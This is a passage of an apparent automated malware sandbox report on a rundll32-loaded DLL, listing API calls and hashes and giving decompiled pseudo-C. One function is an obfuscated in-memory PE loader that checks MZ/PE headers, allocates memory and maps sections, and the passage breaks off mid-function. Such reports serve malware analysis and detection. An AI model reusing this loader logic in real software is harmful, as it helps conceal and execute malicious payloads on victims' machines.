                                                                        • API ID: FileHandleInfoStartupType
                                                                        • String ID:
                                                                        • API String ID: 2461013171-0
                                                                        • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                        • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 145 10013ad4-10013adb 146 10013b46-10013b52 HeapDestroy 145->146 147 10013add-10013aed 145->147 148 10013b34-10013b45 HeapFree 147->148 149 10013aef-10013afd 147->149 148->146 150 10013b00-10013b30 VirtualFree * 2 HeapFree 149->150 150->150 151 10013b32-10013b33 150->151 151->148
                                                                        C-Code - Quality: 100%
                                                                        			E10013AD4() {
                                                                        				int _t2;
                                                                        				void* _t8;
                                                                        				void* _t14;
                                                                        				void** _t15;
                                                                        				void* _t21;
                                                                        				void* _t23;
                                                                        
                                                                        				if( *0x10050a64 == 3) {
                                                                        					_t8 = 0;
                                                                        					_t21 =  *0x10050a48 - _t8; // 0x0
                                                                        					if(_t21 > 0) {
                                                                        						_t14 =  *0x10050a4c; // 0x0
                                                                        						_t15 = _t14 + 0xc;
                                                                        						do {
                                                                        							VirtualFree( *_t15, 0x100000, 0x4000);
                                                                        							VirtualFree( *_t15, 0, 0x8000);
                                                                        							HeapFree( *0x10050a60, 0, _t15[1]);
                                                                        							_t15 =  &(_t15[5]);
                                                                        							_t8 = _t8 + 1;
                                                                        							_t23 = _t8 -  *0x10050a48; // 0x0
                                                                        						} while (_t23 < 0);
                                                                        					}
                                                                        					HeapFree( *0x10050a60, 0,  *0x10050a4c);
                                                                        				}
                                                                        				_t2 = HeapDestroy( *0x10050a60); // executed
                                                                        				return _t2;
                                                                        			}










                                                                        APIs
                                                                        • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                        • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                        • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                        • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                        • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Heap$Virtual$Destroy
                                                                        • String ID:
                                                                        • API String ID: 782257640-0
                                                                        • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                        • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 152 10005260-1000530c 153 10006011-1000601a 152->153 154 10005312-10005361 152->154 154->153 155 10005367-10005409 154->155 155->153 156 1000540f-10005488 155->156 156->153 157 1000548e-100054cb 156->157 157->153 158 100054d1-10005505 157->158 158->153 159 1000550b-10005594 158->159 160 1000559a-100055be 159->160 161 100056bc-100056c2 159->161 162 100055c4-100055d1 160->162 163 100056c8-10005803 GetNativeSystemInfo call 10002bf0 * 2 161->163 164 100055d3-10005602 162->164 165 10005604-10005642 162->165 163->153 174 10005809-10005914 163->174 167 10005644-10005654 164->167 165->167 169 10005656-10005697 167->169 170 10005699 167->170 173 1000569f-100056b4 169->173 170->173 173->162 175 100056ba 173->175 177 10005a04-10005a9b GetProcessHeap HeapAlloc 174->177 178 1000591a-100059fc 174->178 175->163 179 10005ae8-10005bdd call 10002c60 177->179 180 10005a9d-10005ae7 177->180 178->153 183 10005a02 178->183 186 10005be3-10005e5a memcpy call 10002ca0 179->186 187 10006008-1000600e call 10004dd0 179->187 183->177 186->187 193 10005e60-10005ec1 186->193 187->153 194 10005ec7-10005f56 call 10003b80 193->194 195 10005f58 193->195 197 10005f5f-10005f91 call 10003f40 194->197 195->197 197->187 201 10005f93-10005fd6 call 10003570 197->201 203 10005fdb-10005fe0 201->203 203->187 204 10005fe2-10006006 call 10003ad0 203->204 204->187 207 1000601b-10006026 204->207 208 1000602c-10006031 207->208 209 1000610d-1000611d 207->209 210 10006033-100060a4 208->210 211 100060a5-1000610c 208->211
                                                                        C-Code - Quality: 73%
                                                                        			E10005260() {
                                                                        				signed int _t340;
                                                                        				signed int _t351;
                                                                        				signed int _t354;
                                                                        				signed int _t356;
                                                                        				signed int _t360;
                                                                        				void* _t373;
                                                                        				signed int _t385;
                                                                        				signed int _t388;
                                                                        				signed int _t398;
                                                                        				signed int _t403;
                                                                        				intOrPtr _t405;
                                                                        				void* _t410;
                                                                        				signed int _t411;
                                                                        				signed int _t412;
                                                                        				signed int _t413;
                                                                        				signed int _t423;
                                                                        				signed int _t425;
                                                                        				void* _t433;
                                                                        				signed int _t436;
                                                                        				signed int _t437;
                                                                        				signed int _t438;
                                                                        				void* _t441;
                                                                        				signed int _t442;
                                                                        				signed int _t444;
                                                                        				signed int _t448;
                                                                        				intOrPtr _t453;
                                                                        				signed int _t454;
                                                                        				signed int _t463;
                                                                        				void* _t467;
                                                                        				signed int _t468;
                                                                        				signed int _t469;
                                                                        				void* _t473;
                                                                        				signed int _t474;
                                                                        				void* _t475;
                                                                        				void* _t476;
                                                                        				intOrPtr _t478;
                                                                        				signed int _t481;
                                                                        				void* _t492;
                                                                        				signed int _t498;
                                                                        				signed int _t520;
                                                                        				intOrPtr _t523;
                                                                        				signed int _t532;
                                                                        				signed int _t533;
                                                                        				signed short* _t542;
                                                                        				signed int _t545;
                                                                        				signed int _t563;
                                                                        				signed int _t571;
                                                                        				signed int _t579;
                                                                        				signed int _t580;
                                                                        				signed int _t583;
                                                                        				intOrPtr _t585;
                                                                        				signed int _t587;
                                                                        				signed int _t590;
                                                                        				signed int _t604;
                                                                        				signed int _t624;
                                                                        				intOrPtr _t636;
                                                                        				signed int _t637;
                                                                        				signed int _t642;
                                                                        				signed int _t665;
                                                                        				signed int _t668;
                                                                        				signed int _t673;
                                                                        				signed int _t691;
                                                                        				signed int _t692;
                                                                        				signed int _t706;
                                                                        				signed int _t707;
                                                                        				signed int _t716;
                                                                        				signed int _t717;
                                                                        				signed int _t722;
                                                                        				signed int _t726;
                                                                        				signed int _t731;
                                                                        				signed int _t732;
                                                                        				signed int _t733;
                                                                        				signed int _t736;
                                                                        				signed int _t738;
                                                                        				signed int _t739;
                                                                        				signed int _t743;
                                                                        				signed int _t752;
                                                                        				signed int _t754;
                                                                        				signed int _t756;
                                                                        				signed int _t759;
                                                                        				signed int _t761;
                                                                        				signed int _t765;
                                                                        				signed int _t766;
                                                                        				signed int _t770;
                                                                        				signed int _t778;
                                                                        				signed int _t780;
                                                                        				signed int _t789;
                                                                        				signed int _t795;
                                                                        				signed int _t836;
                                                                        				signed int _t840;
                                                                        				signed int _t841;
                                                                        				signed int _t853;
                                                                        				signed int _t867;
                                                                        				signed int _t888;
                                                                        				signed int _t890;
                                                                        				signed int _t891;
                                                                        				signed int _t895;
                                                                        				signed int _t900;
                                                                        				signed int _t903;
                                                                        				signed int _t905;
                                                                        				signed int _t907;
                                                                        				signed int _t913;
                                                                        				signed int _t918;
                                                                        				signed int _t921;
                                                                        				signed int _t924;
                                                                        				signed int _t928;
                                                                        				signed int _t930;
                                                                        				signed int _t932;
                                                                        				signed int _t933;
                                                                        				signed int _t934;
                                                                        				signed int _t941;
                                                                        				intOrPtr* _t951;
                                                                        				signed int _t954;
                                                                        				signed int _t955;
                                                                        				signed int _t956;
                                                                        				signed int _t962;
                                                                        				signed int _t963;
                                                                        				signed int _t970;
                                                                        				signed int _t971;
                                                                        				signed int _t981;
                                                                        				signed int _t988;
                                                                        				signed int _t989;
                                                                        				signed int _t995;
                                                                        				signed int _t1035;
                                                                        				signed int _t1041;
                                                                        				signed int _t1042;
                                                                        				signed int _t1043;
                                                                        				signed short _t1049;
                                                                        				signed int _t1050;
                                                                        				signed int _t1051;
                                                                        				signed int _t1064;
                                                                        				intOrPtr* _t1066;
                                                                        				signed int _t1067;
                                                                        				signed int _t1075;
                                                                        				signed int _t1076;
                                                                        				signed int _t1084;
                                                                        				signed int _t1085;
                                                                        				signed int _t1086;
                                                                        				signed int _t1091;
                                                                        				signed int _t1094;
                                                                        				signed int _t1097;
                                                                        				signed int _t1126;
                                                                        				signed int _t1128;
                                                                        				signed int _t1132;
                                                                        				signed int _t1135;
                                                                        				signed int _t1138;
                                                                        				signed int _t1153;
                                                                        				signed int _t1165;
                                                                        				signed int _t1166;
                                                                        				signed int _t1167;
                                                                        				intOrPtr* _t1168;
                                                                        				signed int _t1169;
                                                                        				signed int _t1170;
                                                                        				signed int _t1174;
                                                                        				signed int _t1184;
                                                                        				signed int _t1187;
                                                                        				signed int _t1200;
                                                                        				void* _t1202;
                                                                        				signed int _t1227;
                                                                        				signed int _t1237;
                                                                        				void* _t1248;
                                                                        				void* _t1249;
                                                                        				void* _t1250;
                                                                        				void* _t1251;
                                                                        
                                                                        				_t691 =  *0x1004b0ec; // 0x0
                                                                        				_t340 =  *0x1004b0e4; // 0x0
                                                                        				_t981 =  *0x1004b0e0; // 0x0
                                                                        				_t932 =  *0x1004b0d8; // 0x0
                                                                        				_t795 =  *0x1004b0dc; // 0x0
                                                                        				_t933 =  *0x1004b0e8; // 0x0
                                                                        				_t4 = _t981 * _t933 + 2; // 0x2
                                                                        				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
                                                                        				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
                                                                        				_t934 =  *0x1004b0e0; // 0x0
                                                                        				_t532 =  *0x1004b0d8; // 0x0
                                                                        				 *(_t1248 + 0x14) = 0;
                                                                        				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
                                                                        					L32:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t988 =  *0x1004b0e0; // 0x0
                                                                        					_t533 = _t532 * _t795;
                                                                        					_t941 =  *0x1004b0e8; // 0x0
                                                                        					_t989 = _t988 * _t691;
                                                                        					 *(_t1248 + 0x10) = _t533;
                                                                        					 *(_t1248 + 0x30) = _t989;
                                                                        					_t542 =  *(_t1248 + 0x5c);
                                                                        					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
                                                                        						goto L32;
                                                                        					} else {
                                                                        						_t995 = _t941 * _t691;
                                                                        						 *(_t1248 + 0x20) = _t542[0x1e];
                                                                        						 *(_t1248 + 0x2c) = _t995;
                                                                        						_t545 =  *0x1004b0d8; // 0x0
                                                                        						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
                                                                        						_t1126 =  *0x1004b0e0; // 0x0
                                                                        						_t36 = _t691 + 1; // 0x1
                                                                        						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
                                                                        							goto L32;
                                                                        						} else {
                                                                        							_t1128 =  *0x1004b0e8; // 0x0
                                                                        							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
                                                                        							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
                                                                        							 *(_t1248 + 0x18) = _t340 + _t340;
                                                                        							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
                                                                        							_t1132 =  *0x1004b0e8; // 0x0
                                                                        							_t563 =  *0x1004b0d8; // 0x0
                                                                        							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
                                                                        							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
                                                                        								goto L32;
                                                                        							} else {
                                                                        								_t1135 =  *0x1004b0e0; // 0x0
                                                                        								_t1138 =  *0x1004b0e0; // 0x0
                                                                        								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
                                                                        									_t1035 =  *0x1004b0e0; // 0x0
                                                                        									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
                                                                        									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
                                                                        										goto L32;
                                                                        									} else {
                                                                        										_t1041 =  *0x1004b0e0; // 0x0
                                                                        										_t1042 =  *0x1004b0e8; // 0x0
                                                                        										_t1043 =  *0x1004b0e8; // 0x0
                                                                        										_t571 =  *0x1004b0d8; // 0x0
                                                                        										_t1153 =  *0x1004b0e0; // 0x0
                                                                        										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
                                                                        										_t579 =  *(_t1248 + 0x18);
                                                                        										_t83 = _t795 - 2; // -2
                                                                        										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
                                                                        										if(_t1049 == 0) {
                                                                        											_t580 =  *0x1004b0d8; // 0x0
                                                                        											_t1050 =  *0x1004b0e8; // 0x0
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
                                                                        											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
                                                                        											_t673 =  *0x1004b0d8; // 0x0
                                                                        											 *(_t1248 + 0x20) = _t1049;
                                                                        											_t1086 =  *0x1004b0e8; // 0x0
                                                                        											do {
                                                                        												_t1237 =  *( *(_t1248 + 0x10) + 4);
                                                                        												 *(_t1248 + 0x18) = _t1237;
                                                                        												if(_t1237 != 0) {
                                                                        													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
                                                                        													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
                                                                        												} else {
                                                                        													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
                                                                        													_t1094 =  *0x1004b0e0; // 0x0
                                                                        													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
                                                                        												}
                                                                        												 *(_t1248 + 0x18) = _t1091;
                                                                        												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
                                                                        													_t673 =  *0x1004b0d8; // 0x0
                                                                        												} else {
                                                                        													_t1097 =  *0x1004b0e0; // 0x0
                                                                        													_t673 =  *0x1004b0d8; // 0x0
                                                                        													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
                                                                        												}
                                                                        												_t1086 =  *0x1004b0e8; // 0x0
                                                                        												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
                                                                        												_t129 = _t1248 + 0x20;
                                                                        												 *_t129 =  *(_t1248 + 0x20) - 1;
                                                                        											} while ( *_t129 != 0);
                                                                        										}
                                                                        										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
                                                                        										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
                                                                        										_t351 =  *0x1004b0e4; // 0x0
                                                                        										_t692 =  *0x1004b0ec; // 0x0
                                                                        										_t1165 =  *0x1004b0e8; // 0x0
                                                                        										_t1051 =  *0x1004b0dc; // 0x0
                                                                        										_t583 =  *0x1004b0e0; // 0x0
                                                                        										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
                                                                        										_t354 =  *0x1004b0d8; // 0x0
                                                                        										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
                                                                        										_t143 = _t354 + 2; // 0x2
                                                                        										_t356 =  *0x1004b0e4; // 0x0
                                                                        										_t360 =  *0x1004b0ec; // 0x0
                                                                        										_t146 = _t1051 + 0xa; // 0xa
                                                                        										_t706 =  *0x1004b0d8; // 0x0
                                                                        										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
                                                                        										_t707 = _t706 * _t1051;
                                                                        										 *(_t1248 + 0x14) = _t707;
                                                                        										_t1166 =  *0x1004b0ec; // 0x0
                                                                        										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
                                                                        										_t1167 =  *0x1004b0d8; // 0x0
                                                                        										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
                                                                        										_t1249 = _t1248 + 8;
                                                                        										if( *(_t1248 + 0x20) != _t373) {
                                                                        											goto L32;
                                                                        										} else {
                                                                        											_t716 =  *0x1004b0ec; // 0x0
                                                                        											 *(_t1249 + 0x20) = _t716 * _t1167;
                                                                        											_t165 = _t1051 + 2; // 0x3
                                                                        											_t717 =  *0x1004b0e8; // 0x0
                                                                        											_t166 = _t1167 + 1; // 0x1
                                                                        											_t385 =  *0x1004b0e4; // 0x0
                                                                        											_t388 =  *0x1004b0ec; // 0x0
                                                                        											_t398 =  *0x1004b0e4; // 0x0
                                                                        											_t403 =  *0x1004b0ec; // 0x0
                                                                        											_t722 =  *0x1004b0e8; // 0x0
                                                                        											_t182 = _t403 + 1; // 0x1
                                                                        											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
                                                                        											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
                                                                        											_t1250 = _t1249 + 0x14;
                                                                        											_t585 = _t405;
                                                                        											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
                                                                        											if(_t585 != 0) {
                                                                        												L21:
                                                                        												_t836 =  *0x1004b0e8; // 0x0
                                                                        												_t726 =  *0x1004b0ec; // 0x0
                                                                        												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
                                                                        												_t840 =  *0x1004b0d8; // 0x0
                                                                        												_t1064 =  *0x1004b0e4; // 0x0
                                                                        												_t841 =  *0x1004b0e8; // 0x0
                                                                        												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
                                                                        												_t731 =  *0x1004b0e8; // 0x0
                                                                        												_t411 =  *0x1004b0e0; // 0x0
                                                                        												_t412 =  *0x1004b0ec; // 0x0
                                                                        												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
                                                                        												if(_t1066 != 0) {
                                                                        													 *((intOrPtr*)(_t1066 + 4)) = _t585;
                                                                        													_t413 =  *0x1004b0e0; // 0x0
                                                                        													_t732 =  *0x1004b0ec; // 0x0
                                                                        													_t224 = _t732 * 2; // -268738780
                                                                        													_t853 =  *0x1004b0e8; // 0x0
                                                                        													_t733 =  *0x1004b0d8; // 0x0
                                                                        													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
                                                                        													asm("sbb eax, eax");
                                                                        													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
                                                                        													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
                                                                        													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
                                                                        													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
                                                                        													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
                                                                        													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
                                                                        													_t423 =  *0x1004b0e8; // 0x0
                                                                        													_t736 =  *0x1004b0e4; // 0x0
                                                                        													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
                                                                        													_t1169 =  *0x1004b0ec; // 0x0
                                                                        													_t425 =  *0x1004b0e4; // 0x0
                                                                        													_t738 =  *0x1004b0e0; // 0x0
                                                                        													_t587 =  *0x1004b0d8; // 0x0
                                                                        													_t739 =  *0x1004b0e8; // 0x0
                                                                        													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
                                                                        													_t867 =  *0x1004b0e0; // 0x0
                                                                        													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
                                                                        													_t1251 = _t1250 + 8;
                                                                        													if(_t433 == 0) {
                                                                        														L31:
                                                                        														_push(_t1066);
                                                                        														E10004DD0();
                                                                        														goto L32;
                                                                        													} else {
                                                                        														_t743 =  *0x1004b0e0; // 0x0
                                                                        														_t436 =  *0x1004b0e8; // 0x0
                                                                        														_t437 =  *0x1004b0dc; // 0x0
                                                                        														_t752 =  *0x1004b0e0; // 0x0
                                                                        														_t1170 =  *0x1004b0e4; // 0x0
                                                                        														_t438 =  *0x1004b0e8; // 0x0
                                                                        														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
                                                                        														_t754 =  *0x1004b0dc; // 0x0
                                                                        														_t590 =  *0x1004b0d8; // 0x0
                                                                        														_t1174 =  *0x1004b0d8; // 0x0
                                                                        														 *(_t1251 + 0x34) = _t441;
                                                                        														_t442 =  *0x1004b0e8; // 0x0
                                                                        														_t888 =  *0x1004b0e4; // 0x0
                                                                        														_t444 =  *0x1004b0ec; // 0x0
                                                                        														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
                                                                        														_t604 =  *0x1004b0d8; // 0x0
                                                                        														_t756 =  *0x1004b0dc; // 0x0
                                                                        														_t448 =  *0x1004b0e0; // 0x0
                                                                        														_t890 =  *0x1004b0ec; // 0x0
                                                                        														_t891 =  *0x1004b0d8; // 0x0
                                                                        														_t279 = _t448 + 0x2e9; // 0x2e9
                                                                        														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
                                                                        														 *_t1066 = _t453;
                                                                        														_t759 =  *0x1004b0e4; // 0x0
                                                                        														_t1184 =  *0x1004b0e0; // 0x0
                                                                        														_t895 =  *0x1004b0e8; // 0x0
                                                                        														_t1187 =  *0x1004b0ec; // 0x0
